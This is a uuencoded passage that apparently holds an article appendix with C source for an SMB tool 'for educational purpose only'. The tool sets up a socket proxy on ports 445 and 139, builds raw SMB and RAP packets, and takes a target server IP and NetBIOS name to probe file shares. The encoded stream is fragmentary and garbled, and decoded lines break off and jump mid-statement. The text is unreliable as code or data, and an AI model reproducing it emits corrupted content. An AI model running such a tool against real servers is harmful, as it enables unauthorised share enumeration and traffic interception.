M1$127T%.62D[#[email protected]#[email protected]]C:U!R;WAY(#[email protected]<V]C:V5T*$%&7TE.150L4T]#
M2U]35%)%04TL-BD[#[email protected]#0HO*E-T87)T('1O(&QI<W1E;B!F;W(@:6YC;VUI
M;F<@8V]N;FYE>&EO;BHO#[email protected]#[email protected]"@-"B`@("`@(%-O8VM0<F]X>2P-
M"B`@("`@("AS=')[email protected]<V]C:V%D9'(@*[email protected]*"90<F]X>2DL#[email protected]("`@("!S
M;BA3;V-K4')O>'DL,2D[#0H-"B!#;W5N="`]('-I>F5O9BAS=')[email protected]<V]C
M:V%D9')?:6XI.PT*#[email protected]]C:U!R;WAY(#[email protected]!T*`T*("`@("`@("`@
M("`@("`@("`@("!3;V-K4')O>'DL#[email protected]("`@("`@("`@("`@("`@("`@("AS
M=')[email protected]<V]C:V%D9'(@*[email protected]*"90<F]X>2DL#[email protected]("`@("`@("`@("`@("`@
M("`@("AI;[email protected]*[email protected]*"9#;W5N="D-"B`@("`@("`@("`@("`@("`@("`I.PT*
M#[email protected]]N;F5C="@-"B`@("`@("`@(%-O8VM3;6)397)V97(L#[email protected]("`@("`@
M('-I>F5O9BAS=')[email protected]<V]C:V%D9')?:6XI#[email protected]("`@("`@("D[#[email protected]#0HO
M#[email protected]>[email protected]#[email protected]("\J8V]N;F5X:6]N(&]N('!O<[email protected]#0U*B\-"B`-"B`@5VEN
M;'-E#[email protected]>PT*("`O*DYO<FUA;"!C;VYN97AI;[email protected];[email protected]<&]R="`Q,SDJ+PT*
M*BHO#0H-"BTM6R`@07!P96YD:[email protected]@0B`-"@T*66]U(&[email protected]:[email protected]=&AI<R!P
M87)T('1H92!S;[email protected];[email protected]=&AE('!R;[email protected]=7-E('1O('[email protected]"
M('-H87)E<RX-"@T*4F5A9"!T:&[email protected]<V]U<F-E+B!9;[email protected]=VEL;"!F:6YD(&[email protected]
M;&]T(&[email protected]:6YT97)E<W1I;F<@=&AI;F=S(&%B;W5T(%--0BX-"@T*[email protected]>6]U
M('=A;[email protected]=&\@8V]M<&EL92!I="[email protected]=&AE(&-O;6UA;[email protected]:7,@(F=C8R!S8V%N
M="`Z(%[email protected]+7,@(G-E<G9E<B!)4"(@[email protected](EEO=7(@;F5T8FEO<R!N
M86UE(BX-"@T*(G-E<G9E<B!)4"(@:7,@=&AE($E0(&%D9')E<W,@;[email protected]=&AE
M('[email protected]>6]U('=A;G0N("AL97-S('[email protected],[email protected]<F%C=&5R<RD-"@T*
M4W5C8V5S<V9U;&QY('1E<W1E9"!W:71H('-A;6)A('-E<G9E<B`R+C`@[email protected]*
M#0I9;[email protected]<VAO=6QD;B=T('5S92!I="!O;B!T:&[email protected];&]O<&)[email protected]:6YT97)F
[email protected]*#0I4:&ES('!R;[email protected]&]E<VXG="!S=7!P;W)T(%5.24-/[email protected]
M0V][email protected]@;&5D:6X-"B`@("`@("`@("`@("`@("`@("`@("`@;&5D:6Y`
M<B!E9'5C871I;VYA;"!P=7)P;W-E(&]N;'[email protected](0T**BHJ*BHJ*BHJ*BHJ*BHJ
M=&0N:#X-"B-I;F-L=61E(#QE<G)N;RYH/@T*(VEN8VQU9&[email protected]/'-I9VYA;"YH
M/@T*(VEN8VQU9&[email protected]/'-Y<R]I;V-T;"YH/@T*(VEN8VQU9&[email protected]/'-Y<R]T:6UE
[email protected]^#0HC:6YC;'5D92`\<WES+W=A:70N:#X-"B-I;F-L=61E(#QS>7,O<W1A
M="YH/@T*#0HC:6YC;'5D92`\;[email protected]^#0HC:6YC;'5D92`\<WES+W-O
M8VME="YH/@T*(VEN8VQU9&[email protected]/&%R<&$O:6YE="YH/@T*#0HC:6YC;'5D92`\
M;F5T:6YE="]I<"YH/@T*(VEN8VQU9&[email protected]/&YE=&EN970O:6XN:#X-"B-I;F-L
M=61E(#QN971I;F5T+W1C<"YH/@T*(VEN8VQU9&[email protected]/&YE=&[email protected]^
M;&EB;[email protected]^#0HC:6YC;'5D92`\<&-A<"YH/@T*#0HC9&5F:6YE(%--0E]0
M(V1E9FEN90EU7VEN=#$V7W0)=6YS:[email protected]<VAO<G0-"@T*(V1E9FEN90EU
M7VEN=#,R7W0)=6YS:[email protected]:6YT(`T*#0HC9&5F:6YE"75C:&%R"75N<VEG
M<R!A;[email protected];&%N;6%N(&-L:65N="[email protected]]R('5S(#[email protected]>"Y386UB82HO#0H-
M"B-D969I;[email protected]%4259%7T][email protected]'@U-5QX-F5<>#8Y7'@W.%QX
M,#!<>#4S7'@V,5QX-F1<#0I<>#8R7'@V,2(-"@T*+RI4:&[email protected]]M;6%N9"!F
M;W(@=&-O;[email protected]@<V-A;FYI;F<@.B`B/S\_/S\B*B\-"@T*(V1E9FEN92!40T].
M,V9<>#-F(B`-"@T*#0HO*E1H92!205`@8V]M;6%N9"!A;[email protected]=&AE(%Q0:7!E
M*BHJ*BHO"0D)("`@("`-"G1Y<&[email protected]<W1R=6-T#0I[#[email protected]=5]I;[email protected]
M4')O=&]C;VQ;-%T["2\J0V]N=&%I;G,@,'A&1BPG4TU")RHO#[email protected]=5]I;G0X
[email protected]]M;6%N9#L)+RI#;VUM86YD($-O9&4J+PT*('5N:6]N(`T*('L-"B`@
M<W1R=6-T#[email protected]('L-"B`@('5?:6YT.%]T($5R<F]R0VQA<W,["2\J17)R;W(@
M0VQA<W,J+PT*("`@=5]I;[email protected])V960["2\J4F5S97)[email protected]]R
M"2\J,S(M8FET<R!E<G)O<B!C;V1E*B\-"B!](%-T871U<R`[#[email protected]=5]I;G0X
[email protected],["2\J1FQA9W,J+PT*('5?:6YT.%]T($9L86=S,ELR73L)+RI-
M;W)E($9L86=S*B\-"B!U;FEO;@T*('L-"B`@=5]I;[email protected]&%D6S$R73L-
M"B`@<W1R=6-T#[email protected]('L-"B`@('5?:6YT.%]T(%!I9$AI9VA;,ET["2\J2&EG
M:"!087)T(&]F('1H92!0:60J+PT*("`@=5]I;[email protected]<V5D6S1=.PDO
M960J+PT*("!]($5X=')A.PT*('[email protected]&%D17AT<F$[#[email protected]=5]I;[email protected]&ED
M6S)=.PDO*[email protected];G1I9FEE<BHO#[email protected]=5]I;[email protected]&ED6S)=.PDO
M;F%U=&AE;G1I8V%[email protected]=7-E<B!)1"HO#[email protected]=5]I;[email protected])=.PDO
M<FET>4UO9&4["2\J4V5C=7)I='[email protected]]D92`Z*B\-"@D)"2\J8FET(#`@.B`P
M/7-H87)E+"`Q/75S97(J+PT*"0D)+RIB:[email protected],2`Z(#$]96YC<GEP="!P87-S
M;F<@;75L=&EP;&[email protected]<F5Q=65S="HO#[email protected]=5]I;[email protected]%X3G5M8F5R
M<U9C<ULR73LO*DUA>"!60W,@[email protected](&%N9"!S97)V97(J
M+PT*('5?:6YT.%]T($UA>$)U9F9E<E-I>F5;-%T[[email protected]@=')A;G-M:[email protected]
M8G5F9F5R('-I>F4J+PT*('5?:6YT.%]T($UA>%)A=U-I>F5;-%T[[email protected]@
M56YI<75E('1O:V5N(&ED96YT:69Y:6YG('1H:7,@<V5S<VEO;BHO#[email protected]=5]I
M;[email protected]%P86)I;&ET:65S6S1=.R\J4V5R=F5R($-A<&%B:6QI=&EE<RHO
M#[email protected]=5]I;[email protected]=&5M5&EM94QO=ULT73LO*E-Y<W1E;2`H551#*2!T
M;65(:6=H6S1=.R\J4WES=&5M("A55$,I('1I;[email protected];[email protected]=&AE('-E<G9E<B`H
M;VYE(&]F('-E<G9E<B`H;6EN(&9R;[email protected]#*2HO#[email protected]=5]I;[email protected]
M#[email protected]=5]I;[email protected]=6YT6S)=.PDO*D-O=6YT(&]F(&1A=&[email protected]
M="`-"GL-"B!U7VEN=#A?="!7;W)D0V]U;G0[#[email protected]=5]I;[email protected]
M=6YT6S)=.PT*('5?:6YT.%]T($)U9F9E<D9O<FUA=#L-"[email protected]')O
M=%)E<75E<W1(9'([(`T*#0H-"G1Y<&[email protected]<W1R=6-T#0I[#[email protected]=5]I;G0X
[email protected]]R9$-O=6YT.R\J0V]U;[email protected];[email protected]<&%R86UE=&5R('=O<F1S/3$S("AR
M97%U97-T*2HO#[email protected]=5]I;[email protected]$-O;6UA;F0[+RIS96-O;F1A<[email protected]
M;F183V9F<V5T6S)=.R\J;V9F<V5T('1O(&YE>'[email protected]]M;6%N9"!7;W)D8V]U
M="HO#[email protected]=5]I;[email protected]=6UB97);,ET[+RHP/69I<G-T("AO;FQY*[email protected]